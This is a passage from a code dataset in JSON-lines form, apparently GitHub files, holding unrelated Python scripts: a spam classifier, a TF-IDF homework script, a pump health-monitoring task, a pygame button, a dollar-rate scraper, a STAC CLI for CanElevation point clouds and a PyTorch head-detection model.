obj.name))\n","repo_name":"jdkloe/pybufr-ecmwf","sub_path":"example_programs/find_descriptor_code.py","file_name":"find_descriptor_code.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"38515464199","text":"from pathlib import Path\nfrom setuptools import setup\n\nbase_path = Path(__file__).parent\n\nwith open(base_path / \"requirements.txt\") as f:\n requirements = f.readlines()\n\nwith open(base_path / \"requirements_dev.txt\") as f:\n requirements_dev = f.readlines()\n\ndescription = \"\"\"This package implements:\n1) A class for reading Magda data files in flat file (ffd) format\n2) Routines for calculating a handful of spacecraft position properties\n with respect to Saturn\n3) An implementation of an arbitrary order B-field spherical harmonic expansion model\"\"\"\n\nsetup(\n name=\"magda_tools\",\n version=\"0.1\",\n description=\"A collection of tools for working with MAGDA data files\",\n long_description=description,\n url=\"https://github.com/ImperialCollegeLondon/magda_tools\",\n author=\"Research Software Engineering Group, Imperial College\",\n author_email=\"\",\n packages=[\"magda_tools\"],\n python_requires=\">=3.7\",\n install_requires=requirements,\n tests_require=requirements_dev,\n project_urls={\"Source\": \"https://github.com/ImperialCollegeLondon/magda_tools\"},\n)\n","repo_name":"ImperialCollegeLondon/magda_tools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26527541007","text":"import pandas\r\nfrom scipy.stats import zscore\r\n\r\n# 0 --> Non-Spammer, 1 --> Spammer\r\ndef scoringZ():\r\n\tzscoreMap = {}\r\n\tfor i in range(1,11):\r\n\t\tnamaFile = str(i)+\".csv\"\r\n\t\thari1 = pandas.read_csv(namaFile,low_memory=False,header=None)\r\n\t\thari1[12] = hari1[12].astype('category')\r\n\t\thari1[12] = hari1[12].cat.codes\r\n\t\thari1[hari1.select_dtypes('int64').columns]=hari1[hari1.select_dtypes('int64').columns].apply(zscore)\r\n\t\tzscoreMap[namaFile] = hari1\r\n\treturn zscoreMap\t\r\n\r\nallData = scoringZ()\r\n\r\ndef pengujian(data=allData):\r\n\tfor i in range(1,11):\r\n\t\tdataLatih = data[str(i)+\".csv\"]\r\n\t\tdataUji = None\r\n\t\tfor j in range(1,11):\r\n\t\t\tif(j != i):\r\n\t\t\t\tnamaFile = str(j)+\".csv\"\r\n\t\t\t\tif(dataUji is None):\r\n\t\t\t\t\tdataUji = data[namaFile]\r\n\t\t\t\telse:\r\n\t\t\t\t\tdataUji=dataUji.append(data[namaFile])\r\n\t\tfrom sklearn import svm\r\n\t\tfrom sklearn.model_selection import train_test_split\r\n\t\tX_train = dataLatih.iloc[:,0:12]\r\n\t\ty_train = dataLatih.iloc[:,12]\r\n\t\tX_test = dataUji.iloc[:,0:12]\r\n\t\ty_test = dataUji.iloc[:,12]\r\n\t\tclf = svm.SVC(cache_size=2000)\r\n\t\tclf.fit(X_train,y_train)\r\n\t\tfrom sklearn.metrics import precision_recall_fscore_support\r\n\t\tprecision,recall,fbeta_score,support = precision_recall_fscore_support(y_test, clf.predict(X_test))\r\n\t\twith open('NRF.txt', 'a') as the_file:\r\n\t\t\tthe_file.write(\"Day: \"+str(i)+\"\\n\")\r\n\t\t\tthe_file.write(\"Precision: \"+str(precision[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"Recall: \"+str(recall[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"FMeasure: \"+str(fbeta_score[1])+\"\\n\")\r\n\t\t\tthe_file.write(\"****************\"+\"\\n\")\r\n\t\tprint(\"Pass Day: \",i)\r\npengujian()","repo_name":"herley-shaori/Perolehan-Informasi-Lanjut","sub_path":"IRL.py","file_name":"IRL.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37444639846","text":"from pymongo import MongoClient\nfrom helpers.env import load_env\n\n\ndef saveCode(email, code):\n client = MongoClient(load_env(\"APP_MONGODB_URL\"))\n db = client[\"djangoMFA\"]\n codes_collection = db[\"codes\"]\n\n codes_collection.insert_one({\n \"email\": email,\n \"code\": code,\n })\n","repo_name":"shipperauto/leads_api","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1320527545","text":"#!/usr/bin/env python3\n\nimport urllib.request as ul\nimport urllib.error as ule\nimport sys\nfrom boilerpipe.extract import Extractor\nimport json\nimport math\nimport scipy.stats as stats\n\n\n\n\n\ndef saveHtml():\n f = open('hashedlinks.txt', 'r') # Get the links.\n links = []\n for line in f:\n links.append(line.rstrip(\"\\n\\r\")) # Put the links in a list.\n\n counter = 0\n html_dump = dict() # All of the HTML Data goes here.\n\n for link in links: # For every link\n # Stressed human loading bar\n sys.stdout.write(\"\\033[K\")\n print(\"Getting HTML \" + str(round((counter / len(links)) * 100, 2)) + \"% complete.\")\n sys.stdout.write(\"\\033[F\")\n counter += 1\n\n try:\n html_data = get_html(link) # Get the HTML Code\n except:\n pass\n\n if html_data != None:\n html_dump[link] = html_data\n\n to_save_link_text = dict() # JSON is outputted from here.\n\n for key in html_dump.keys(): # For everything in html dump\n raw_html = html_dump[key] # The raw html.\n\n ex = Extractor(extractor='ArticleExtractor', html=raw_html)\n text = ex.getText() # The parsed html.\n\n linkdict = dict() # This is where the clean formatted data goes.\n linkdict['raw_html'] = str(raw_html) # Put in the raw html.\n linkdict['clean_html'] = str(text) # Put in the clean text.\n linkdict['link'] = str(key) # Put in the link for output.\n\n to_save_link_text[hash(key)] = linkdict\n\n f = open('html_data.json', 'w') # Save the html for future use.\n json.dump(to_save_link_text, f)\n f.close()\n\n\n# Gets the html code for the webpage. If the link is not claimed by any server or\n# lacks a top level domain, it will raise an error.\ndef get_html(url):\n try:\n temp_html_reader = ul.urlopen(url) # Opens the page.\n except ule.URLError:\n return None\n\n return temp_html_reader.read() # Returns the html code.\n\n#Calculate tfidf and output in requested format.\ndef tf_idf(searchTerm, IDF):\n f = open('html_data.json', 'r') # Get old data.\n data = json.load(f)\n f.close()\n\n print(\"TFIDF\tTF\t IDF\t URI\")\n print(\"-----\t--\t ---\t ---\") # (below) Initialize data storage list.\n outputList = [[0], [0], [0], [0], [0], [0], [0], [0], [0], [0], [0], [0]]\n for key in data.keys(): # For every link.\n clean_html = data[key]['clean_html'] # Get the clean text.\n instances = clean_html.count(searchTerm) # Get count of of instances of the search term in the text.\n words = clean_html.split(' ')\n word_count = len(words) # Get word count of clean text.\n tf = instances/word_count # Calculate tf value.\n tfidf = (instances/word_count) * IDF # Calculate tf-idf value.\n if round(tf, 3) != 0: # (below) store all relevant data.\n outputList = little_sorter(outputList, tfidf, str(round_sig(tfidf, 3)) + \" \" + str(round_sig(tf, 3)) + \" \" + str(round_sig(IDF, 3)) + \" \" + data[key]['link'])\n\n for data in outputList:\n print(data[1]) # Print the data\n\n\n# Sorts the links by tf-idf value, maximum to minimum.\ndef little_sorter(list, newVal, fullLine, extraData = None):\n listCounter = 0\n nlist = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n for i in range(12): # Find the maximum value 12 times. (NOTE in homework output will only display 10. Two results are bad bad bad.\n if newVal > list[listCounter][0]:\n nlist[i] = [newVal, fullLine, extraData]\n newVal = 0\n else:\n nlist[i] = list[listCounter]\n listCounter += 1\n\n return nlist\n\n\n# Calculate idf based on number of google search results.\ndef idf(results_in_engine):\n return math.log(130000000000000/results_in_engine, 2.0)\n\n\n# Rounds to sig figs. From user Stephen Rauch at location https://stackoverflow.com/questions/3410976/how-to-round-a-number-to-significant-figures-in-python\ndef round_sig(x, sig=2):\n return round(x, sig-int(math.floor(math.log10(abs(x))))-1)\n\n\n# Uses the scipy library to calculate kendal tau b. Turns out its a basic function ¯\\_(ツ)_/¯.\ndef kendallTauCalculation(a1, a2):\n return stats.kendalltau(a1, a2)\n\n#saveHtml()\ntf_idf('opportunity', idf(3170000000)) # Calculate tf-idf and output it.\n\n\ntfidf_values = [0.356, 0.288, 0.214, 0.214, 0.158, 0.151, 0.15, 0.124, 0.123, 0.114]\npage_rank = [9.2, 8.5, 8.7, 8.9, 8.5, 8.5, 8.5, 8.5, 8.5, 8.6]\nalexa = [1721, 814, 934, 1462, 814, 162, 814, 4914, 4914, 597] # https://www.rank2traffic.com/\nprint(\"FOR TFIDF AND PAGERANK\")\nprint(kendallTauCalculation(tfidf_values, page_rank))\n\nprint(\"FOR TFIDF AND alexa\")\nprint(kendallTauCalculation(tfidf_values, alexa))\n\nprint(\"FOR alexa AND PAGERANK\")\nprint(kendallTauCalculation(alexa, page_rank))\n\n\n\n\n\ntfidf_values = [0.967, 0.0579, 0.0126, 0.151, 0.022, 0.0234, 0.0196, 0.05, 0.0692, 0.03]\npage_rank = [9.5, 10.0, 8.5, 8.5, 7.5, 2.5, 3.7, 4.0, 8.9, 6.7]\nprint(\"FOR RANDOM\")\nprint(kendallTauCalculation(tfidf_values, page_rank))\n","repo_name":"TimothyBruce/anwala.github.io","sub_path":"cs532-s19/assignments/A3/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"22426520339","text":"\"\"\"\n该任务涉及插入表: MsetWarningLog,AssetHI\n涉及更新表:Asset\n\"\"\"\nimport datetime\n\nimport numpy as np\n\nfrom db import session_make\nfrom db.conn_engine import meta_engine\nfrom db_model import PumpUnit, AssetHI, MeasurePoint, MsetWarningLog, Asset\nfrom services.MSET.core import (\n Temp_MemMat,\n mset_estimate,\n calculate_similarity,\n threshold_caculate,\n)\n\n\ndef fetch_pumps(session):\n pumps = (\n session.query(\n PumpUnit.asset_id, PumpUnit.mset_model_path, Asset.name.label(\"name\")\n )\n .filter(PumpUnit.mset_model_path != None)\n .join(Asset, Asset.id == PumpUnit.asset_id)\n .all()\n )\n\n return pumps\n\n\ndef fetch_mps(session, asset_id):\n mps = (\n session.query(\n MeasurePoint.name, MeasurePoint.station_id, MeasurePoint.inner_station_id\n )\n .filter(MeasurePoint.asset_id == asset_id, MeasurePoint.type == 0)\n .order_by(MeasurePoint.inner_station_id)\n .all()\n )\n\n return mps\n\n\ndef fetch_base_data(session, cycle_number, base_mp, asset_id):\n data = session.execute(\n \"SELECT d.id as id, d.time as time, d.rms as rms \"\n \"from vib_data_{0}_{1} as d \"\n \"LEFT JOIN asset_hi_{2} as h on d.id = h.data_id \"\n \"where h.data_id is null \"\n \"order by d.id \"\n \"limit {3};\".format(\n base_mp.station_id, base_mp.inner_station_id, asset_id, cycle_number\n )\n )\n\n return data.fetchall()\n\n\ndef fetch_feature_matrix(session, base_data_list, mps):\n feature_matrix = []\n for base_data in base_data_list:\n feature_row = [base_data[\"rms\"]]\n for mp in mps[1:]:\n query = \"select rms from vib_data_{0}_{1} order by abs(datediff(time,'{2}')) limit 1\".format(\n mp.station_id, mp.inner_station_id, base_data[\"time\"]\n )\n res = session.execute(query)\n res = res.fetchall()\n feature_row.append(res[0][\"rms\"])\n feature_matrix.append(feature_row)\n feature_matrix = np.array(feature_matrix)\n return feature_matrix\n\n\ndef evaluate(path, feature_matrix):\n memory_mat = np.load(path)\n feature_matrix_max = memory_mat[-2, :]\n feature_matrix_min = memory_mat[-1, :]\n memory_mat = memory_mat[:-2, :]\n temp_memory_mat = Temp_MemMat(memory_mat)\n feature_matrix = (feature_matrix - feature_matrix_min) / (\n feature_matrix_max - feature_matrix_min\n )\n Kest = mset_estimate(\n memorymat=memory_mat, Kobs=feature_matrix, Temp=temp_memory_mat\n )\n\n sim = calculate_similarity(feature_matrix, Kest)\n thres, warning_index = threshold_caculate(sim)\n Kest = Kest * (feature_matrix_max - feature_matrix_min) + feature_matrix_min\n return sim, thres, Kest, warning_index\n\n\ndef determine_statu(feature_matrix):\n if feature_matrix[-1][0] < 0.2:\n return 4\n else:\n x = []\n for item in feature_matrix[-1]:\n x.append(np.searchsorted([2.8, 7.1, 18], item))\n return int(np.array(x).max())\n\n\ndef mset_evaluate(cycle_number):\n estimate_count = 0\n session = session_make(engine=meta_engine)\n pumps = fetch_pumps(session)\n for pump in pumps:\n\n asset_hi_model = AssetHI.model(point_id=pump.asset_id)\n mps = fetch_mps(session=session, asset_id=pump.asset_id)\n\n if len(mps) > 0:\n base_data_list = fetch_base_data(\n session=session,\n cycle_number=cycle_number,\n base_mp=mps[0],\n asset_id=pump.asset_id,\n )\n if len(base_data_list) == cycle_number:\n feature_matrix = fetch_feature_matrix(\n session=session, base_data_list=base_data_list, mps=mps\n )\n sim, thres, Kest, warning_index = evaluate(\n path=pump.mset_model_path, feature_matrix=feature_matrix\n )\n\n evaluate_res_insert_value = []\n\n for i in range(len(base_data_list)):\n\n evaluate_res_insert_value.append(\n asset_hi_model(\n health_indicator=float(sim[i][0] * 100),\n similarity=float(sim[i][0]),\n threshold=float(thres[i][0]),\n time=base_data_list[i][\"time\"],\n data_id=base_data_list[i][\"id\"],\n est={\n \"label\": [mp.name for mp in mps],\n \"raw\": feature_matrix[i].tolist(),\n \"est\": Kest[i].tolist(),\n },\n )\n )\n try:\n for index, row in enumerate(evaluate_res_insert_value):\n\n session.add(row)\n session.commit()\n if len(warning_index) != 0:\n if index in warning_index:\n session.add(\n MsetWarningLog(\n cr_time=base_data_list[index][\"time\"],\n description=mps[\n np.argmax(\n feature_matrix[index] - Kest[index]\n )\n ].name\n + \"异常。\",\n asset_id=pump.asset_id,\n reporter_id=row.id,\n )\n )\n session.commit()\n session.query(Asset).filter(Asset.id == pump.asset_id).update(\n {\n \"statu\": determine_statu(feature_matrix=feature_matrix),\n \"health_indicator\": evaluate_res_insert_value[\n -1\n ].health_indicator,\n \"md_time\": datetime.datetime.now(),\n }\n )\n session.commit()\n estimate_count += len(evaluate_res_insert_value)\n except Exception as e:\n session.rollback()\n print(e)\n\n session.close()\n\n return estimate_count\n\n\nif __name__ == \"__main__\":\n for i in range(15):\n estimate_count = mset_evaluate(3)\n","repo_name":"peilion/OP-backend","sub_path":"tasks/mset_task.py","file_name":"mset_task.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"43142834560","text":"#coding=utf-8\nclass Person:\n def greet(self):\n self.age = 10;\n print(\"hello ,world! I'm %s .\" % self.name);\n\np1 = Person();\np2 = Person();\np1.name=\"hl\";\np2.name=\"bb\";\np1.greet();\np2.greet();\np1.greet = lambda :print(\"hello\"); #\np1.greet();\np2.greet();\nprint(p1.age);\nprint(\".............................................\")\n\n\nfoo = lambda x:x+1;\nprint(foo(1));","repo_name":"scpahl/MyPythonCode","sub_path":"007-class/01-defineClass.py","file_name":"01-defineClass.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43650370168","text":"\"\"\"\nDuy Nguyen\n1/11/21\n\"\"\"\n\nimport pygame\n\n\nclass Button():\n def __init__(self, x, y, image, scale, type):\n # make sure to pass image in already loaded by pygame\n self.type = type # 0 for button, 1 for label\n self.x = x\n self.y = y\n self.scale = scale # scales button to desired size\n self.width = image.get_width()\n self.height = image.get_height()\n self.image = pygame.transform.scale(image, (int(self.width * scale), int(self.height * scale)))\n # button gets bigger when hovered over\n self.scaledImage = pygame.transform.scale(self.image, (int(self.width * self.scale * 1.1), int(self.height * self.scale * 1.1)))\n self.rect = self.image.get_rect()\n self.rect.topleft = (x,y)\n self.clicked = False\n\n def update(self, win):\n # if clickable button\n if self.type == 0:\n action = False # turns on when clicked. calls for an action\n\n pos = pygame.mouse.get_pos() #position of mouse\n\n if self.rect.collidepoint(pos):\n # button gets bigger when hovered over\n # compensate coordinates for bigger button\n self.rect.x = self.x + int((self.image.get_width() - self.image.get_width() * 1.1) / 2)\n self.rect.y = self.y + int((self.image.get_height() - self.image.get_height() * 1.1) / 2)\n image = self.scaledImage\n\n if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n self.clicked = True\n action = True\n else:\n image = self.image\n self.rect.topleft = (self.x, self.y)\n\n if pygame.mouse.get_pressed()[0] == 0:\n self.clicked = False\n\n # draws button\n win.blit(image, (self.rect.x, self.rect.y))\n\n # returns whether the button was clicked or not\n return action\n\n # if just a label\n else:\n win.blit(self.image, (self.rect.x, self.rect.y))\n\n","repo_name":"Duweee/Sprite-Survival","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37241910602","text":"# A Linked list keeps the items\n# of the Node class.\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n def append(self, new_node):\n self.next = new_node\n\n# Create a linked list of 5 items.\nhead = Node(10) # The head of the list\ncurr = head\nfor n in range(20, 60, 10):\n new_node = Node(n)\n curr.append(new_node)\n curr = new_node\n\n# Print the items in the linked list.\ncurr = head\nwhile curr:\n print(curr.value, '-> ', end='')\n curr = curr.next\nprint('END')\n\n# Output:\n# 10 -> 20 -> 30 -> 40 -> 50 -> END\n","repo_name":"ash/amazing_python3","sub_path":"tasks/t-010.py","file_name":"t-010.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"73529545427","text":"#!/usr/bin/env python\n\"\"\"\nWrapper file for plotting function\n\nAuthors: Kostis SZ, Romina Ariazza and Clara Tump\n\"\"\"\n\nfrom matplotlib import pyplot as plt\n\n\ndef plot_2d_function(x, y, y_pred=None, title=None):\n plt.scatter(x, y, color='blue')\n\n if y_pred is not None:\n plt.scatter(x, y_pred, color='red')\n\n plt.title(title)\n plt.show()\n\n\ndef plot_2d_function_multiple(x, y, y_pred, title=None):\n plt.plot(x, y, color='blue')\n\n for y_p in y_pred:\n plt.plot(x, y_p)\n\n plt.title(title)\n plt.show()\n\n\ndef plot_errors(x, y, title=None):\n plt.figure()\n plt.errorbar(x, y, fmt='o')\n labels = [str(i) for i in x]\n plt.xticks(x, labels)\n plt.title(title)\n plt.show()\n","repo_name":"clara2911/ANNProject","sub_path":"Tutorial 2/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36658904147","text":"#Command to run on terminal in the smai_proj folder:\n#python3 perpronperemail.py ./clean_enron/ > perpronperemail.txt\n\nimport sys\nimport os\nimport nltk\n\nclasses = ['Benjamin_Rogers','Chris_Dorland','Drew_Fossum','Jeffrey_Shankman','Kevin_Presto','Kimberly_Watson','Lynn_Blair','Mark_Haedicke','Michelle_Cash', 'Phillip_Allen']\n#classes = ['Benjamin_Rogers']\n#print len(classes)\n\ndirec = sys.argv[1]\n#direc = \"./clean_enron/\"\n\nfor c in classes:\n\tlisting = os.listdir(direc+c)\n\t#numemail = len(listing)\n\t#count = 0\n\tfor filename in listing:\n\t\tf = open(direc+c+'/'+filename, 'r')\n\t\ttext = f.read()\n\t\ttok = nltk.word_tokenize(text)\n\t\tpostag = nltk.pos_tag(tok)\n\t\tcount = 0\n\t\tfor i in range(len(postag)):\n\t\t\tif postag[i][1] == \"PRP\":\n\t\t\t\tcount = count + 1\n\t\tprint(c+','+filename+','+str(count))\n\t\tf.close()\n\n","repo_name":"IamAdiSri/auth-id","sub_path":"feature_extraction_scripts/perpronperemail.py","file_name":"perpronperemail.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"26961268538","text":"import json\nimport logging\nimport os\n\nimport click\nimport pystac\nfrom click import Command, Group\n\nfrom stactools.canelevation.constants import METADATA_URL\nfrom stactools.canelevation.stac import create_collection, create_item\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_canelevation_command(cli: Group) -> Command:\n \"\"\"Creates a command group for commands working with\n canelevations.\n \"\"\"\n\n @cli.group(\n \"canelevation\",\n short_help=(\"Commands for working with \" \"CanElevation point clouds.\"),\n )\n def canelevation() -> None:\n pass\n\n @canelevation.command(\n \"create-collection\",\n short_help=\"Creates a STAC collection from NRCan CanElevation\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-m\", \"--metadata\", help=\"URL to the NRCan metadata json\", default=METADATA_URL\n )\n def create_collection_command(destination: str, metadata: str) -> None:\n \"\"\"Creates a STAC Collection from NRCan Land Use CanElevation metadata\n\n Args:\n destination (str): Directory to create the collection json\n metadata (str, optional): Path to json metadata file - provided by NRCan\n\n Returns:\n Callable\n \"\"\"\n # Collect the metadata as a dict and create the collection\n collection = create_collection(metadata)\n\n # Set the destination\n output_path = os.path.join(destination, \"collection.json\")\n collection.set_self_href(output_path)\n collection.normalize_hrefs(destination)\n\n # Save and validate\n collection.save()\n collection.validate()\n\n @canelevation.command(\n \"create-item\", short_help=\"Create a STAC Item from a las or laz file\"\n )\n @click.argument(\"href\")\n @click.argument(\"dst\")\n @click.option(\"-r\", \"--reader\", help=\"Override the default PDAL reader.\")\n @click.option(\n \"-q\", \"--quick\", is_flag=True, help=\"Do a quick look at the COPC data.\"\n )\n @click.option(\n \"-t\",\n \"--pointcloud-type\",\n default=\"lidar\",\n help=\"Set the pointcloud type (default: lidar)\",\n )\n @click.option(\n \"--compute-statistics/--no-compute-statistics\",\n default=False,\n help=\"Compute statistics for the pointcloud (could take a while)\",\n )\n @click.option(\n \"-p\",\n \"--providers\",\n help=\"Path to JSON file containing array of additional providers\",\n )\n def create_item_command(\n href: str,\n dst: str,\n reader: str,\n pointcloud_type: str,\n compute_statistics: bool,\n providers: str,\n quick: bool,\n ) -> None:\n \"\"\"Creates a STAC Item based on the header of a pointcloud.\n\n HREF is the pointcloud file.\n DST is directory that a STAC Item JSON file will be created\n in.\n \"\"\"\n additional_providers = None\n if providers:\n with open(providers) as f:\n additional_providers = [\n pystac.Provider.from_dict(d) for d in json.load(f)\n ]\n\n item = create_item(\n href,\n pdal_reader=reader,\n compute_statistics=compute_statistics,\n pointcloud_type=pointcloud_type,\n additional_providers=additional_providers,\n quick=quick,\n )\n\n item_path = os.path.join(dst, \"{}.json\".format(item.id))\n item.set_self_href(item_path)\n item.make_asset_hrefs_relative()\n item.save_object()\n item.validate()\n\n return canelevation\n","repo_name":"stactools-packages/canelevation","sub_path":"src/stactools/canelevation/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17463698987","text":"def carga_inicial(): \n \n from bs4 import BeautifulSoup\n import pandas as pd\n import requests\n import re\n \n \n \n web = 'https://dolarhoy.com/'\n response = requests.get(web)\n content = response.text\n \n soup = BeautifulSoup(content, 'html.parser')\n \n dolares = soup.find('div', class_=\"tile is-parent is-7 is-vertical\")\n dolares = (dolares).get_text()\n \n fecha = soup.find('div', class_=\"tile update\")\n fecha = (fecha).get_text()\n \n dolares_split = dolares.split(\" \")\n dolares_list = dolares_split\n \n \n def captura_compra(tipo_dolar):\n result = re.search(\"compra(.*?)venta\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar = result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta(tipo_dolar):\n result = re.search(\"Venta(.*?)Dólar\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta_1(tipo_dolar):\n result = re.search(\"Venta(.*?)Contado\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta_2(tipo_dolar):\n result = re.search(\"Venta(.*?)Publicá\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_fecha(tipo_dolar):\n result = re.search(\"el(.*?)m\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n return tipo_dolar\n \n # Creacion de valores de venta\n blue_compra = captura_compra(dolares_list[1])\n oficial_compra = captura_compra(dolares_list[3])\n bolsa_compra = captura_compra(dolares_list[4])\n contado_liqui_compra = captura_compra(dolares_list[6])\n crypto_compra = captura_compra(dolares_list[7])\n\n # Creacion de valores de venta\n blue_venta = captura_venta(dolares_list[1])\n oficial_venta = captura_venta(dolares_list[3])\n bolsa_venta = captura_venta_1(dolares_list[4])\n contado_liqui_venta = captura_venta(dolares_list[6])\n crypto_venta = captura_venta(dolares_list[7])\n solidario_venta = captura_venta_2(dolares_list[8])\n \n # Limpieza fecha\n fecha = captura_fecha(fecha)\n fecha_split = fecha.split( )\n fecha = fecha_split[0]\n hora = fecha_split[1]\n am_pm = fecha_split[2]\n\n return fecha, hora, am_pm, blue_compra, oficial_compra, bolsa_compra, contado_liqui_compra, crypto_compra, blue_venta, oficial_venta, bolsa_venta, contado_liqui_venta, crypto_venta, solidario_venta\n","repo_name":"emirigueiro/Dev-R","sub_path":"Inflation_library/ETL_Dolar.py","file_name":"ETL_Dolar.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41895349668","text":"import torch \r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport matplotlib.pyplot as plt\r\nimport torchvision.transforms as transforms\r\nfrom PIL import Image\r\nfrom numpy import loadtxt\r\nimport torch.optim as optim\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n#init\r\nepochs = 30\r\nlr = 0.01\r\ndataset_size = 1746\r\nbatch_size = 10\r\nn_features = 100\r\ninput_chanels = 1\r\nload_m = False\r\nmodel_path = \"models\\\\model_test.pth.tar\"\r\n\r\ndataset_path = \"D:\\\\Datasets\\\\Head_hunt\\\\\"\r\ntraining_dataset = []\r\nvalidation_dataset = []\r\nvalidation_labels = []\r\ntraining_labels = []\r\n\r\ndef save_mod(state, filename = model_path):\r\n\ttorch.save(state, filename)\r\n\r\ndef load_mod(checkpoint):\r\n\tmodel.load_state_dict(checkpoint['state_dict'])\r\n\toptimizer.load_state_dict(['state_dict'])\r\n\r\ndef im_convert(tensor):\r\n\timage = tensor.cpu().clone().detach().numpy()\r\n\t#clone tensor --> detach it from computations --> transform to numpy\r\n\t#image = image.squeeze()\r\n\t#image = image.transpose(1, 2, 0)\r\n\t# swap axis from(1,28,28) --> (28,28,1)\r\n\t#image = image * np.array((0.5, 0.5, 0.5)) + np.array((0.5, 0.5, 0.5))\r\n\t#denormalize image\r\n\t#image = image.clip(0, 1)\r\n\t#sets image range from 0 to 1\r\n\treturn image\r\n\r\n# load array\r\nlabels = loadtxt('data.csv', delimiter=',')\r\n\r\n# print the array\r\nprint(\"converting labels...\", end = \"\\r\")\r\n\r\nfor idx, i in enumerate(labels):\r\n\tif i[2] == -1:\r\n\t\ti[0], i[1], i[2] = -0.9, -0.9, -0.9\r\n\telse:\r\n\t\tlabels[idx][2] = 112.0 \r\n\t\tlabels[idx] = labels[idx]/112.0\r\n\r\n\r\n\r\n\r\nprint(\"labels_converted...\", end = \"\\r\")\r\n\r\n#dataloading\r\nraw_data = [Image.open(dataset_path + \"head (\" + str(i) + \").png\" ).convert(\"L\") for i in range(1, dataset_size)]\r\n\r\ntransform_train = transforms.Compose([transforms.ToTensor(),\r\n\t\t\t\t\t\t\t\t\t transforms.Normalize((0.5,),\r\n\t\t\t\t\t\t\t\t\t \t\t\t\t\t (0.5,))\r\n\t\t\t\t\t\t\t\t\t ])\r\n\r\nprint(\"converting images...\", end = \"\\r\")\r\n\r\nfor idx, img in enumerate(raw_data):\r\n\tif idx % 20 == 0:\r\n\t\tvalidation_dataset.append(transform_train(img))\r\n\t\tvalidation_labels.append(labels[idx])\r\n\telse:\r\n\t\ttraining_dataset.append(transform_train(img))\r\n\t\ttraining_labels.append(labels[idx])\r\n\r\n\r\n\r\n#plt.imshow(im_convert(training_dataset[1][0]))\r\n#plt.show()\r\n\r\nraw_data = None\r\nlabels = None\r\n\r\ntraining_labels = torch.from_numpy(np.array(training_labels)).double()\r\nvalidation_labels = torch.from_numpy(np.array(validation_labels)).double()\r\n\r\nprint(\"images_converted...\", end = \"\\r\")\r\n\r\ntraining_dataset = torch.stack(training_dataset)\r\nvalidation_dataset = torch.stack(validation_dataset) \r\nprint(validation_dataset.shape)\r\n\r\n#print(type(validation_labels))\r\n\r\ntraining_dataset = torch.utils.data.TensorDataset(training_dataset, training_labels)\r\nvalidation_dataset = torch.utils.data.TensorDataset(validation_dataset, validation_labels) \r\n\r\ntraining_loader = torch.utils.data.DataLoader(training_dataset, batch_size = batch_size, shuffle = True)\r\nvalidation_loader = torch.utils.data.DataLoader(validation_dataset, batch_size = batch_size, shuffle = False)\r\n\r\n#neural_network_init\r\n\r\nclass Head_hunter(nn.Module):\r\n\tdef __init__(self, n_features, input_chanels, batch_size):\r\n\t\tsuper().__init__()\r\n\t\tself.conv1 = nn.Conv2d(input_chanels, n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.conv2 = nn.Conv2d(n_features, n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.conv3 = nn.Conv2d(n_features, 